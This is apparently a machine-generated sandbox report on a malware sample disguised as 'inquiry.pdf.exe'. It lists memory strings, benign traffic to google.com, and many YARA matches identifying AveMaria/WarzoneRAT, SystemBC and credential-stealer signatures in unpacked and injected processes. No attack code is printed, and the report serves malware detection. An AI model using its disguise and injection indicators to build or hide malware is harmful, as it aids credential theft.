            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: inquiry.pdf.exe, 00000000.00000003.261927166.000000000654B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
            Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: inquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: unknownDNS traffic detected: queries for: www.google.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.3:49705 version: TLS 1.2
            Source: inquiry.pdf.exe, 00000000.00000002.313574266.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputData

            E-Banking Fraud

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects SystemBC Author: ditekSHen
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: inquiry.pdf.exe
            Source: inquiry.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
